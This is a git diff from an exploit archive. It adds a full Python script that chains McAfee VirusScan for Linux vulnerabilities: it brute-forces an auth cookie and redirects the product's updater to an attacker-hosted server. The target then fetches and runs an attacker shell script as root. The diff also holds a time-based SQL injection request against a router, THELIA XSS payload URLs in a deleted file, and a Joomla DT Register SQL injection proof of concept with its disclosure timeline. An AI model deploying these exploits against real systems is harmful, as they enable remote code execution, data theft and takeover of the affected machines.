+# Tested on: Windows AND Linux +# Demo : https://www.youtube.com/watch?v=WrGgHvhiCGg + +POC : + +flagFresh Parameter Vulnerable + +POST /Forms/status_1 HTTP/1.1 +Host: 192.168.1.1 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: http://192.168.1.1/status.html +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00 + +flagFresh=0 + +Request : + +POST /Forms/status_1 HTTP/1.1 +Host: 192.168.1.1 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: http://192.168.1.1/status.html +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 +Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00 + +flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1 \ No newline at end of file diff --git a/platforms/linux/remote/40911.py b/platforms/linux/remote/40911.py new file mode 100755 index 000000000..82519e741 --- /dev/null +++ b/platforms/linux/remote/40911.py @@ -0,0 +1,289 @@ +''' +Source: https://nation.state.actor/mcafee.html + +Vulnerabilities + +CVE-2016-8016: Remote Unauthenticated File Existence Test +CVE-2016-8017: Remote Unauthenticated File Read (with Constraints) +CVE-2016-8018: No Cross-Site Request Forgery Tokens +CVE-2016-8019: Cross Site Scripting +CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation +CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location +CVE-2016-8022: Remote Use of Authentication Tokens +CVE-2016-8023: Brute Force Authentication Tokens +CVE-2016-8024: HTTP Response Splitting +CVE-2016-8025: Authenticated SQL Injection +When chaned together, these vulnerabilities allow a remote attacker to execute code as root. +''' +#!/bin/python3 +import time +import requests +import os +import sys +import re +import threading +import subprocess +from http.server import BaseHTTPRequestHandler, HTTPServer +from socketserver import ThreadingMixIn + +# Per-target configuration +target_domain="https://10.0.1.130" # https://target_ip +local_ip = '10.0.1.128' # Attacker IP for victim to connect back to +authorized_ip="127.0.0.1" # IP address cookie will be valid for +update_server_port = 8080 # Port update server listens on +delay_seconds = 10 # How long should the server take to serve the update +target_port = 55443 # Port to target + +# Put payload script in payload.sh + +# Initialization +payload_in_place = threading.Event() +requests.packages.urllib3.disable_warnings() +with open("payload.sh", "r") as f: + payload = f.read() + +def pprint(inp, flag=False): + pad = "#" + if flag: + pad = "*" + print("\n" + pad+ " " + inp) + + +def crack_cookie(): + pprint("Cracking Cookie") + + # A page that requires authentication + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html" + + # Start at the current time + 100 in case of recent login with clock skew + date_val = int(time.time()+100) + cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20 + + # Make requests, print after every 600 + while True: + cookie = cookie_fmt % date_val + req_cookie = {"nailsSessionId": cookie} + r = requests.get(url, cookies=req_cookie, verify=False) + r.raise_for_status() + + if "Set-Cookie" in r.headers: + valid_cookie = cookie + timestamp = cookie.split("/")[3].split("-")[0] + break + + elif date_val % 600 == 0: + print("Now trying %s" % time.asctime(time.localtime(date_val))) + + date_val -= 1 + + pprint("Cookie Cracked: " + timestamp, True) + return valid_cookie + + +def update_update_server(auth_cookie): + pprint("Updating update server") + + # Replace McAfeeHttp update server with attacker local_ip:update_server_port + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \ + "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \ + "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \ + "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \ + "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \ + "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \ + "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \ + "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \ + + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \ + "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \ + "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \ + "eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \ + "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \ + "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \ + "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \ + "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \ + "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \ + "posProperty=fallback&useOfProxy=on" + + r = requests.get(url, cookies=auth_cookie, verify=False) + r.raise_for_status() + pprint("Updated update server", True) + +def download_update(req_cookie): + pprint("Requesting target download payload") + + # Send request to make target download payload + url = target_domain + ":" + str(target_port) + "/0409/nails" + + updateName = "update_%d" % int(time.time()) + postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \ + "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \ + "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \ + "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \ + "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \ + "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \ + "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \ + "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \ + "Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) + r.raise_for_status() + + pprint("Payload download requested", 1) + + +def exec_catalogz(req_cookie): + pprint("Making target execute payload") + + #### Get commit_id and ODS_name + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \ + ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \ + "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \ + "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \ + ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \ + "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction" + + r = requests.get(url, cookies=req_cookie, verify=False) + r.raise_for_status() + + regex = re.search("\|digest=(.+?)\|", r.text) + if not regex: + print("\nERROR: Could not get commit_id when generating evil scan\n") + return False + + commit_id = regex.groups(1)[0] + + # Send request to start evil scan + payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z" + binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x + + url = target_domain + ":" + str(target_port) + "/0409/nails" + + ODS_name = "ODS_1" # This may need to be increased if the name already exists + scan_name = "scan_%s" % str(int(time.time())) + + postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \ + "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \ + "ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \ + "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \ + ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \ + "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \ + "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \ + "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \ + "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \ + "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \ + "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \ + "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \ + "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \ + "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \ + "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \ + "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \ + "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \ + ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \ + "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \ + "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \ + ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \ + "on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \ + "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \ + "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \ + "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \ + "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \ + "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \ + "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \ + "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \ + "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \ + "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) + r.raise_for_status() + + pprint("Payload executed", 1) + +def start_update_server(): + + class RequestHandler(BaseHTTPRequestHandler): + def do_HEAD(s): + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + + def do_GET(s): + if s.path == "/catalog.z": + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + s.wfile.write(bytes(payload, "utf-8")) + + pprint("Payload placed", 1) + + payload_in_place.set() + + # Die after sending payload so we send an incomplete response + raise KillServer + + else: # Assume all other requests are for SiteStat - Always increasing version + s.send_response(200) + s.send_header("Content-type", "text/xml") + s.end_headers() + s.wfile.write(bytes(("""""" \ + """""" \ + """ """) % int(time.time()), "utf-8")) + + # Throwing KillServer will shutdown the server ungracefully + class KillServer(Exception): + def __str__(self): + return "Kill Server (not an error)" + + # ThreadingMixIn plus support for KillServer exceptions + class AbortableThreadingMixIn(ThreadingMixIn): + def process_request_thread(self, request, client_address): + try: + self.finish_request(request, client_address) + self.shutdown_request(request) + except KillServer: + pprint("Killing update server dirtily") + self.shutdown_request(request) + self.shutdown() # Only if we want to shutdown + except: + self.handle_error(request, client_address) + self.shutdown_request(request) + + + class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer): + pass + + pprint("Launching update server") + + srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler) + threading.Thread(target=srv.serve_forever).start() + + pprint("Update server started", 1) + return srv + + +#################################################################################### +#################################################################################### + +pprint("Attacking %s" % target_domain, 1) + +# Crack the auth cookie +cookie = crack_cookie() +auth_cookie = {"nailsSessionId": cookie} + +# Start our update server locally +srv = start_update_server() + +# Force target to use our update server +update_update_server(auth_cookie) + +# Make target download an update from us +download_update(auth_cookie) + +# Block until the target downloads our payload, +payload_in_place.wait() + +# Shutdown our update server +srv.shutdown() + +# Execute /bin/sh -(?) catalog.z +exec_catalogz(auth_cookie) \ No newline at end of file diff --git a/platforms/php/webapps/33548.txt b/platforms/php/webapps/33548.txt deleted file mode 100755 index c3a948d60..000000000 --- a/platforms/php/webapps/33548.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/37855/info - -THELIA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. - -An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -The issues affect THELIA 1.4.2.1; other versions may also be affected. - - -http://www.example.com/panier.php?action=ajouter&ref="> -http://www.example.com/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1 -http://www.example.com/rss.php?ref=">&id_rubrique= \ No newline at end of file diff --git a/platforms/php/webapps/40912.txt b/platforms/php/webapps/40912.txt new file mode 100755 index 000000000..5f4c62492 --- /dev/null +++ b/platforms/php/webapps/40912.txt @@ -0,0 +1,99 @@ +Title: SQL injection in Joomla extension DT Register +Credit: Elar Lang / https://security.elarlang.eu +Vulnerability: SQL injection +Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5) +CVE: pending +Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html +Vendor: DTH Development +Vendor URL: http://www.dthdevelopment.com/ +Product: DT Register "Calendar & Event Registration" +Product URL: https://extensions.joomla.org/extension/dt-register +Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html + + +# Background + +"DT Register is the Joomla Event Registration component that gives you +functionality beyond what any other event booking solution can offer" +(https://extensions.joomla.org/extension/dt-register) + + +# Vulnerability + +SQL injection in Joomla extension "DT Register" by DTH Development +allows remote unauthenticated attacker to execute arbitrary SQL +commands via the cat parameter. + + +# Preconditions + +No pre-conditions for authentication or authorization. + + +# Proof-of-Concept + +http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events + +PoC value (shows out all events / it's possible to see valid eventId values): +cat[0]=6) OR 1-- - + + +## Using UNION + +For reading the data out using UNION it's important to have and to +know one valid eventId (detected in previous step). + +In total there are 112 fields in select query, eventId position is no +13. For output is best to use position 112. + +Step-by-Step - how to read the data out is available in blog: +https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html + + +# Vulnerability Disclosure Timeline + +Full communication is available in blog: +https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html + +2016-10-17 | me > DTH | via web form - I would like to report some +security holes. What is the correct way for that? +2016-10-18 | me > DTH | any response? +2016-10-25 | me > DTH | mail to dthdev@dthdevelopment.com +2016-10-25 | DTH > me | +* "you are not in our client list" +* "Our site (dthdevelopment.com) is protected by an enterprise grade firewall" +2016-10-25 | me > DTH | I'm whitehat, technical details +2016-10-25 | DTH > me | description, what kind of serious problems I may face +2016-10-25 | me > DTH | explanations +2016-11-02 | me > DTH | hello? +2016-11-11 | me > DTH, SiteLock | Last call. +2016-11-11 | SiteLock / DTH / me | some communication +2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open +in the setup" +2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5) +2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed +the problem on our demo site". +2016-12-12 | me | Full Disclosure on security.elarlang.eu +2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org + + +## asking CVE from DWF (Distributed Weakness Filing Project) / +http://iwantacve.org + +2016-10-20 | me > DWF | CVE request +2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for +CVE Assignment" +2016-10-31 | me > DWF | I accept +2016-11-19 | me > DWF | Any feedback or decision? (still no response) +2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response) + +As I haven't got any feedback, you can take this post as CVE request. + + +# Fix +DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5). + +-- +Elar Lang +Blog @ https://security.elarlang.eu +Pentester, lecturer @ http://www.clarifiedsecurity.com